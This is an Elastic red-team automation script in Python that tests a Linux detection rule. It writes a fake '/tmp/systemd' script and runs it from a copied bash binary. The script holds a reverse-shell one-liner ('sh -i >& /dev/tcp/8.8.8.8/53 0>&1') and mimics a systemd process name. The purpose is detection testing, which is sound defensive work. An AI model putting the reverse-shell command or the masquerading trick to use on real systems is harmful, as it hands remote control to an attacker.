protections machine
60 lines
1.8 KiB
Python
60 lines
1.8 KiB
Python
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
|
|
# or more contributor license agreements. Licensed under the Elastic License
|
|
# 2.0; you may not use this file except in compliance with the Elastic License
|
|
# 2.0.
|
|
|
|
import os
|
|
import sys
|
|
from pathlib import Path
|
|
|
|
from . import RtaMetadata, common
|
|
|
|
metadata = RtaMetadata(
|
|
uuid="517a466b-f11f-4469-8e5a-a39f4edf333a",
|
|
platforms=["linux"],
|
|
endpoint=[
|
|
{
|
|
"rule_name": "Systemd Execution Followed by Network Connection",
|
|
"rule_id": "6644d936-36a2-4d21-95f3-4826e6b61b9b",
|
|
},
|
|
],
|
|
techniques=["T1543", "T1059", "T1071"],
|
|
)
|
|
|
|
|
|
@common.requires_os(*metadata.platforms)
|
|
def main() -> None:
|
|
shell_command = "/tmp/bash"
|
|
shell_args = "-c 'sh -i >& /dev/tcp/8.8.8.8/53 0>&1'"
|
|
parent_process = "/tmp/systemd"
|
|
|
|
common.execute(["cp", "/bin/bash", shell_command])
|
|
|
|
# Create the fake parent process script
|
|
with Path(parent_process).open("w", encoding="utf-8") as script:
|
|
script.write("#!/bin/bash\n")
|
|
script.write(f"{shell_command} {shell_args}\n")
|
|
|
|
# Make the script executable
|
|
common.execute(["chmod", "+x", parent_process])
|
|
common.execute(["chmod", "+x", shell_command])
|
|
|
|
# Use os.fork() to simulate the parent/child relationship
|
|
pid = os.fork()
|
|
if pid == 0:
|
|
# Child process: Execute the fake parent process script
|
|
os.execl(parent_process, parent_process) # noqa: S606
|
|
else:
|
|
# Parent process: Wait for the child process to complete
|
|
os.waitpid(pid, 0)
|
|
common.log("Fake parent process script executed")
|
|
common.log("RTA execution completed.")
|
|
|
|
# Cleanup
|
|
common.remove_file(parent_process)
|
|
common.remove_file(shell_command) # Remove the copied /tmp/bash
|
|
|
|
|
|
if __name__ == "__main__":
|
|
sys.exit(main())
|